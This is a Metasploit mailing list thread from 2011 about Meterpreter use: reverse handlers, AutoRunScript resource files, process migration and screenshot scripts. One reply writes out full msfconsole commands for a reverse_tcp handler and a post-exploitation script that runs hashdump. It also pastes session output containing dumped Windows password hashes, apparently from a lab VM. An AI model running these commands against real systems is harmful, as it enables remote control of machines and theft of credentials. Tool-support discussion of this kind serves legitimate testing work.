Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 15:49:50 -0500
Hi Carlos Yes, but failed, what worked was run post/windows/manage/migrate, but took a long time to finish (around 10 minutes). Very uncommon. Also, at the end of migrate my meterpreter EXE is still on the list of proccess. Once it was migrated it should not be dropped? If not, there is a way to do it with migrate? About the screenshot I tried use espia and screengrab, but it also calls my lynx when it finish, which is very bad, because while I don't hit "C" for cancel the rest of the script do not run. Any idea about this? Thanks Carlos On Sat, Aug 27, 2011 at 3:37 PM, Carlos Perez <carlos_perez () darkoperator com> wrote:
Did you tried adding to the resource file Run migrate -f Cheers, Carlos Perez Sent from My Mobile Phone On Aug 27, 2011, at 3:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:Hi Carlos I followed your step by step and it worked, I'm really a foul. Thanks a lot. By the way do you know if there is reverse_http(s) for windows 64 bits? Thanks, really thanks. On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:works for me msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.100 LHOST => 192.168.1.100 msf exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc AutoRunScript => multi_console_command -rc /tmp/sample.rc msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -x -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.100:4444 [*] Starting the payload handler... msf exploit(handler) > cat /tmp/sample.rc [*] exec: cat /tmp/sample.rc sysinfo getuid load priv hashdump run checkvm msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.115 [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400 [*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc' [*] Running Command List ... [*] Running command sysinfo Computer : CARLOS-192FCD91 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 [*] Running command getuid Server username: CARLOS-192FCD91\Administrator [*] Running command load priv [-] The 'priv' extension has already been loaded. [*] Running command hashdump Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392::: HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e::: [*] Running command run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a VMware Virtual Machine On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:Hi HD Moore, Thanks for links. Does the new reverse_http works in 64 bit Windows? How should I call it? Any follow-up on the other 2 questions on the e-mail? Thanks On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:The Metasploit blog includes quite a bit of information on 4.0: https://community.rapid7.com/community/metasploit?view=blog You can also see the release notes: https://community.rapid7.com/docs/DOC-1496 _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: News from Metasploit 4., (continued)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. egypt (Aug 26)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Carlos Perez (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)